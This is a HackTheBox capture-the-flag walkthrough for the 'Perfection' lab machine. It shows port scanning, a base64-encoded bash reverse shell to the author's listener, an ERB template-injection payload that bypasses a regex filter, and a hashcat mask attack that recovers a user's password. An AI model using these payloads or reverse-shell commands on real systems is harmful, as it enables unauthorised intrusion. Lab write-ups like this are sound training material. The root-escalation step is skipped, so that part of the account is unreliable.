Welcome! It is time to look at the Perfection machine on HackTheBox. I am making these walkthroughs to keep myself motivated to learn cyber security and ensure that I remember the knowledge gained by playing HTB machines.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Level — Easy
OS — Linux
Machine URL : Hack The Box :: Hack The Box
About Perfection —Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the `sudo` group. Further enumeration uncovers a database with password hashes, and the user's mail reveals a possible password format. Using a mask attack on the hash, the user's password is obtained, which is leveraged to gain `root` access.
Enumeration
To kick off this box, let’s run a Nmap scan to see what services and ports are open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn 10.10.11.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 14:02 EDT
Nmap scan report for perfection.htb (10.10.11.253)
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 196.07 ms 10.10.14.1
2 196.11 ms perfection.htb (10.10.11.253)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.12 secondsThe scan shows that the ports for TCP (22) & SSH Service is Running & TCP (80) http Service is Running on Port 80.
Let’s add Perfection host to our /etc/hosts file.
sudo echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hostsWhen we type IP on Firefox, we see there is a web page.
At the bottom of the page, we saw there is a verbose version number.
Ok, let’s explore this version.
There doesn’t seem to be any vulnerabilities for 1.7.0. Let’s keep looking around.
The site has input fields we could use to inject code.
The next step involves listening for incoming connections using nc -lvnp 1234.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...Obtaining a Reverse Shell
First, we will create a reverse shell script in bash.
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.15.7/1234 0>&1"We encode it to base64 and copy it to the clipboard.
cat revshell.sh | base64 | xclip -sel clipAnd encode it back to URL, using hURL.
The use of hURL to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities.
┌──(kali㉿kali)-[~]
└─$ hURL -B "bash -i >& /dev/tcp/10.10.15.7/1234 0>&1"
Original :: bash -i >& /dev/tcp/10.10.15.7/1234 0>&1
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS43LzEyMzQgMD4mMQ== Inject Payload
Use Burp Suite to capture the POST Request. Then paste in the Payload.
Payload —
a%0A<%25%3d+system("echo+'<payload_base64_url_encoded>'+|base64+-d+|bash")%3b+%25>Reverse shell received as susan-perfection
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.15.7] from (UNKNOWN) [10.10.11.253] 35964
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$ cd
susan@perfection:~$ ls
Migration ruby_app user.txt
susan@perfection:~$ cat user.txt
438da74ad9377edb00dff3a238b87ae5User.txt — 438da74ad9377edb00dff3a238b87ae5
Privilege escalation
We could run the command sudo -l to try to find superuser processes that we can run as the user Susan, but since we don’t have the user’s password, we can’t do anything in this case.
Hehe!!! we found a hash on Migration.
Crack the Hash
I guessed from the hints it was a mask attack. So, I used Hashcat tool to decrypt the hash using this.
┌──(kali㉿kali)-[~]
└─$ echo "<HASH>" > hash.txt
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d?d"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 -a 3 hash.txt susan_nasus_?d?d?d?d?d?d?d?d?d --showAfter spending sometimes Hashcat return the plain text password.
susan:susan_nasus_413759210When Hashcat has finished, we will be able to access the system as superuser (by executing sudo su).
┌──(kali㉿kali)-[~]
└─$ ssh susan@10.10.11.253Logged in as ‘susan’ re-using ‘susan_nasus_413759210’
Hehe!!! Finally, we got the root flag.
Root.txt — 0af9fc4be72846950b3ff4980c9b66a1
I hope you enjoyed this writeup! Happy Hacking :)
Follow me on below Social Media:
- LinkedIn: Reju Kole
2. Instagram: reju.kole.9
3. Respect me On HackTheBox! : W40X
4. Check My TryHackMe Profile : TryHackMe | W40X
5. Twitter | X : @Mr_W40X
6. GitHub : W40X | Reju Kole | Security Researcher
in case you need any help feel free to message me on my social media handles.
